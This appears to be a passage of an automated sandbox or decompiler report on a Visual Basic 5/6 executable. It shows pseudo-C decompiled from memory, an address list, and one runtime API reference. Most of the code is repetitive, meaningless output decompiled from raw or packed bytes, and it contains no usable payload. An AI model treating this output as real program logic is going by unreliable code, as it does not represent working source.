						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						 *_t31 =  *_t31 + _t31;
						_t35 = _t31 ^ 0x1311856;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *_t35 =  *_t35 + _t35;
						 *0x35033535 =  *0x35033535 + _t78;
						asm("movsb");
						_t41 = _t35 ^ 0xe8e1c0;
						_pop(ss);
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						 *_t41 =  *_t41 + _t41;
						asm("cdq");
						_push( *0x35ff3535);
						_t50 = _t41 ^ 0xf13033 ^  *(_t41 ^ 0xf13033);
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *_t50 =  *_t50 + _t50;
						 *0x350a3535 =  *0x350a3535 + _t78;
						asm("cmc");
						_push( *0x35ff3535);
						_push( *0x35913535);
						_t58 = _t50 ^ 0x35ff6bf7;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						 *_t58 =  *_t58 + _t58;
						_push( *0x35ff3535);
						_push( *_t70);
						_push( *0x34ff3535);
						_t64 = _t58 ^ 0x34633f01;
						_t65 = _t64 & 0x00000000;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *_t65 =  *_t65 + _t65;
						 *0x350a3535 =  *0x350a3535 + _t78;
						_push( *0x32ff3535);
						goto ( *__esp);
					}
					asm("popad");
					if(_t97 <= 0) {
						goto L14;
					}
					if (_t97 >= 0) goto L8;
					_t31 = _t31 | 0x4e000901;
					_t98 = _t31;
					asm("popad");
					if(_t98 < 0) {
						goto L16;
					}
					asm("popad");
					if(_t98 == 0) {
						goto L15;
					}
					if(_t98 < 0) {
						goto L17;
					}
					 *_t77 =  *_t77 + _t70;
					 *_t31 =  *_t31 + _t31;
					_t80 = _t78 + 1;
					 *_t80 =  *_t80 + _t31;
					_t30 = _t31 + 0xcb3623;
					 *((intOrPtr*)(0xa60c1fe7 + _t83 * 2)) =  *((intOrPtr*)(0xa60c1fe7 + _t83 * 2)) + _t77;
					 *_t83 =  *_t83 + _t77;
					asm("retf");
					 *_t30 =  *_t30 + _t30;
					 *_t30 =  *_t30 + _t30;
					 *_t30 =  *_t30 + _t30;
					L12:
					_t68 = _t30 +  *_t30;
					 *_t68 =  *_t68 & _t68;
					 *_t68 =  *_t68 + _t68;
					 *_t68 =  *_t68 + _t68;
					 *_t68 =  *_t68 & _t68;
					 *_t68 =  *_t68 + _t68;
					 *[ss:eax] =  *[ss:eax] + _t68;
					 *_t68 =  *_t68 + _t80;
					 *_t68 =  *_t68 ^ _t68;
					 *_t77 =  *_t77 + _t68;
					 *_t68 =  *_t68 + _t68;
					 *((intOrPtr*)(_t68 - 0x21ffffdb)) =  *((intOrPtr*)(_t68 - 0x21ffffdb)) + _t77;
					asm("adc [eax], al");
					 *((intOrPtr*)(_t68 + 0x60)) =  *((intOrPtr*)(_t68 + 0x60)) + _t68;
					 *_t68 =  *_t68 + _t68;
					 *_t68 =  *_t68 + _t68;
					 *_t68 =  *_t68 & _t68;
					 *_t68 =  *_t68 + _t68;
					_t78 =  *_t83;
					 *_t83 = _t80;
					 *_t68 =  *_t68 + _t68;
					 *_t68 =  *_t68 - _t68;
					 *_t68 =  *_t68 + _t68;
					 *_t68 =  *_t68 & _t68;
					 *_t68 =  *_t68 + _t68;
					_t31 = _t68 + 1;
					 *_t31 =  *_t31 + _t31;
					 *_t77 =  *_t77 + _t31;
					 *_t31 =  *_t31 + _t31;
					 *_t31 =  *_t31 + _t31;
					goto L13;
				}
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				asm("int3");
				 *_t30 =  *_t30 ^ _t30;
				asm("sbb al, 0x50");
				 *((intOrPtr*)(_t81 - 0x2d)) = 0xeb;
				asm("sti");
				_t70 = _t70 + _t70 - 1;
				asm("aas");
				asm("fistp qword [edx-0x37]");
				_t80 = 0x161;
				_t85 = _t85;
				if(_t85 < 0) {
					goto L12;
				}
				asm("lodsb");
				_t69 = _t30;
				asm("stosb");
				 *((intOrPtr*)(_t69 - 0x2d)) =  *((intOrPtr*)(_t69 - 0x2d)) + _t69;
				_t30 = _t70 ^  *(_t77 - 0x48ee309a);
				_t73 = _t69;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				 *_t30 =  *_t30 + _t30;
				asm("hlt");
				asm("iretd");
				 *_t30 =  *_t30 + _t30;
				_t10 = _t77;
				_t77 = _t73;
				_t70 = _t10;
				 *_t30 =  *_t30 + _t30;
				 *((intOrPtr*)(_t30 + _t30)) =  *((intOrPtr*)(_t30 + _t30)) + _t77;
				goto L5;
			}

0x004015b8
0x004015bd
0x004015c2
0x004015c4
0x004015c6
0x004015c8
0x004015ca
0x004015cc
0x004015cd
0x004015cf
0x004015d1
0x004015d3
0x004015d4
0x004015d5
0x004015d7
0x004015de
0x004015df
0x004015e0
0x004015e3
0x004015e3
0x004015e4
0x004015e6
0x004015e8
0x004015ea
0x004015ec
0x004015ee
0x004015f0
0x004015f2
0x004015f4
0x004015f5
0x004015f6
0x0040166a
0x0040166a
0x0040166c
0x0040166d
0x0040166e
0x0040166f
0x00401670
0x004016e2
0x004016e2
0x004016e4
0x004016e5
0x004016e5
0x004016e8
0x004016e9
0x004016e9
0x004016eb
0x004016ed
0x004016ef
0x004016f1
0x004016f3
0x004016f3
0x004016f5
0x004016f7
0x004016f9
0x004016f9
0x004016fb
0x004016fd
0x004016ff
0x00401701
0x00401703
0x00401705
0x00401707
0x00401709
0x0040170b
0x0040170d
0x0040170f
0x00401711
0x00401713
0x00401715
0x00401717
0x00401719
0x0040171b
0x0040171d
0x0040171f
0x00401721
0x00401723
0x00401725
0x00401727
0x00401729
0x0040172b
0x0040172d
0x0040172f
0x00401731
0x00401733
0x00401735
0x00401737
0x00401739
0x0040173b
0x0040173d
0x0040173f
0x00401741
0x00401743
0x00401745
0x00401747
0x00401749
0x0040174b
0x0040174d
0x0040174f
0x00401751
0x00401753
0x00401755
0x00401757
0x00401759
0x0040175b
0x0040175d
0x0040175f
0x00401761
0x00401763
0x00401765
0x00401767
0x00401769
0x0040176b
0x0040176d
0x0040176f
0x00401771
0x00401773
0x00401775
0x00401777
0x00401779
0x0040177b
0x0040177d
0x0040177f
0x00401781
0x00401783
0x00401785
0x00401787
0x00401789
0x0040178b
0x0040178d
0x0040178f
0x00401791
0x00401793
0x00401795
0x00401797
0x00401799
0x0040179b
0x0040179d
0x0040179f
0x004017a1
0x004017a3
0x004017a5
0x004017a7
0x004017a9
0x004017ab
0x004017ad
0x004017af
0x004017b1
0x004017b3
0x004017b5
0x004017b7
0x004017b9
0x004017bb
0x004017bd
0x004017bf
0x004017c1
0x004017c3
0x004017c5
0x004017c7
0x004017c9
0x004017cb
0x004017cd
0x004017cf
0x004017d1
0x004017d3
0x004017d5
0x004017d7
0x004017d9
0x004017db
0x004017dd
0x004017df
0x004017e1
0x004017e3
0x004017e5
0x004017e7
0x004017e9
0x004017eb
0x004017ed
0x004017ef
0x004017f1
0x004017f3
0x004017f5
0x004017f7
0x004017f9
0x004017fb
0x004017fd
0x004017ff
0x00401801
0x00401803
0x00401805
0x00401807
0x00401809
0x0040180b
0x0040180d
0x0040180f
0x00401811
0x00401813
0x00401815
0x00401817
0x00401819
0x0040181b
0x0040181d
0x0040181f
0x00401821
0x00401823
0x00401825
0x00401827
0x00401829
0x0040182b
0x0040182d
0x0040182f
0x00401831
0x00401833
0x00401835
0x00401837
0x00401839
0x0040183b
0x0040183d
0x0040183f
0x00401841
0x00401843
0x00401845
0x00401847
0x00401849
0x0040184b
0x0040184d
0x0040184f
0x00401851
0x00401853
0x00401855
0x00401857
0x00401859
0x0040185b
0x0040185d
0x0040185f
0x00401861
0x00401863
0x00401865
0x00401867
0x00401869
0x0040186b
0x0040186d
0x0040186f
0x00401871
0x00401873
0x00401875
0x00401877
0x00401879
0x0040187b
0x0040187d
0x0040187f
0x00401881
0x00401883
0x00401885
0x00401887
0x00401889
0x0040188b
0x0040188d
0x0040188f
0x00401891
0x00401893
0x00401895
0x00401897
0x00401899
0x0040189b
0x0040189d
0x0040189f
0x004018a1
0x004018a3
0x004018a5
0x004018a7
0x004018a9
0x004018ab
0x004018ad
0x004018af
0x004018b1
0x004018b3
0x004018b5
0x004018b7
0x004018c5
0x004018ca
0x004018cc
0x004018ce
0x004018d0
0x004018d2
0x004018d4
0x004018d6
0x004018d8
0x004018da
0x004018dc
0x004018de
0x004018e0
0x004018e2
0x004018e4
0x004018e6
0x004018e8
0x004018ea
0x004018ec
0x004018ee
0x004018f0
0x004018f2
0x004018f4
0x004018f6
0x004018f8
0x004018fa
0x004018fc
0x004018fe
0x00401900
0x00401902
0x00401904
0x00401906
0x00401908
0x0040190a
0x0040190c
0x0040190e
0x00401910
0x00401912
0x00401914
0x00401916
0x00401918
0x0040191a
0x0040191c
0x0040191e
0x00401920
0x00401922
0x00401924
0x00401926
0x00401928
0x0040192a
0x0040192c
0x0040193c
0x00401947
0x0040194c
0x0040194d
0x0040194f
0x00401951
0x00401953
0x00401955
0x00401957
0x00401959
0x0040195b
0x0040195d
0x0040195f
0x00401961
0x00401963
0x00401965
0x00401967
0x00401969
0x0040196b
0x0040196d
0x0040196f
0x00401971
0x00401973
0x00401975
0x00401977
0x00401979
0x0040197b
0x0040197d
0x0040197f
0x00401981
0x00401983
0x00401985
0x00401987
0x00401989
0x0040198b
0x0040198d
0x0040198f
0x00401991
0x00401993
0x00401995
0x00401997
0x00401999
0x0040199b
0x0040199d
0x0040199f
0x004019b0
0x004019c0
0x004019d0
0x004019d2
0x004019d4
0x004019d6
0x004019d8
0x004019da
0x004019dc
0x004019de
0x004019e0
0x004019e2
0x004019e4
0x004019e6
0x004019e8
0x004019ea
0x004019ec
0x004019ee
0x004019f0
0x004019f2
0x004019f4
0x004019f6
0x004019f8
0x004019fa
0x004019fc
0x004019fe
0x00401a00
0x00401a02
0x00401a04
0x00401a06
0x00401a08
0x00401a0a
0x00401a0c
0x00401a0e
0x00401a10
0x00401a12
0x00401a14
0x00401a16
0x00401a18
0x00401a1a
0x00401a1c
0x00401a2c
0x00401a3c
0x00401a4c
0x00401a52
0x00401a57
0x00401a59
0x00401a5b
0x00401a5d
0x00401a5f
0x00401a61
0x00401a63
0x00401a65
0x00401a67
0x00401a69
0x00401a6b
0x00401a6d
0x00401a6f
0x00401a71
0x00401a73
0x00401a75
0x00401a77
0x00401a79
0x00401a7b
0x00401a7d
0x00401a7f
0x00401a81
0x00401a83
0x00401a85
0x00401a87
0x00401a89
0x00401a8b
0x00401a8d
0x00401a8f
0x00401a91
0x00401a93
0x00401a95
0x00401a97
0x00401a99
0x00401a9b
0x00401aac
0x00401abc
0x00401ac0
0x00401ac6
0x00401acf
0x00401ad2
0x00401ad4
0x00401ad6
0x00401ad8
0x00401ada
0x00401adc
0x00401ade
0x00401ae0
0x00401ae2
0x00401ae4
0x00401ae6
0x00401ae8
0x00401aea
0x00401aec
0x00401aee
0x00401af0
0x00401af2
0x00401af4
0x00401af6
0x00401af8
0x00401afa
0x00401afc
0x00401afe
0x00401b00
0x00401b02
0x00401b04
0x00401b06
0x00401b08
0x00401b0a
0x00401b0c
0x00401b0e
0x00401b10
0x00401b12
0x00401b14
0x00401b16
0x00401b18
0x00401b1a
0x00401b1c
0x00401b2c
0x00401b34
0x00401b34
0x00401674
0x00401675
0x00000000
0x00000000
0x00401677
0x00401679
0x00401679
0x0040167e
0x0040167f
0x00000000
0x00000000
0x00401681
0x00401682
0x00000000
0x00000000
0x00401684
0x00000000
0x00000000
0x00401686
0x00401688
0x0040168a
0x0040168b
0x0040168d
0x00401692
0x00401696
0x00401698
0x00401699
0x0040169b
0x0040169d
0x0040169f
0x0040169f
0x004016a1
0x004016a3
0x004016a5
0x004016a7
0x004016ab
0x004016ad
0x004016b0
0x004016b2
0x004016b4
0x004016b6
0x004016b8
0x004016be
0x004016c0
0x004016c3
0x004016c5
0x004016c7
0x004016cb
0x004016cd
0x004016cd
0x004016cf
0x004016d1
0x004016d3
0x004016d5
0x004016d7
0x004016d9
0x004016da
0x004016dc
0x004016de
0x004016e0
0x00000000
0x004016e0
0x004015ff
0x00401601
0x00401603
0x00401605
0x00401609
0x0040160a
0x0040160c
0x0040160e
0x00401612
0x00401618
0x00401619
0x0040161f
0x00401626
0x00401629
0x0040162a
0x00000000
0x00000000
0x0040162c
0x00401636
0x00401638
0x00401639
0x0040163c
0x0040163c
0x0040163d
0x0040163f
0x00401641
0x00401643
0x00401645
0x00401647
0x00401649
0x0040164b
0x0040164d
0x0040164f
0x00401651
0x00401653
0x00401655
0x00401657
0x00401659
0x0040165b
0x0040165d
0x0040165f
0x00401661
0x00401662
0x00401663
0x00401665
0x00401665
0x00401665
0x00401667
0x00401669
0x00000000

APIs

#100.MSVBVM60(VB5!6&*), ref: 004015BD

Strings

VB5!6&*, xrefs: 004015B8

Memory Dump Source

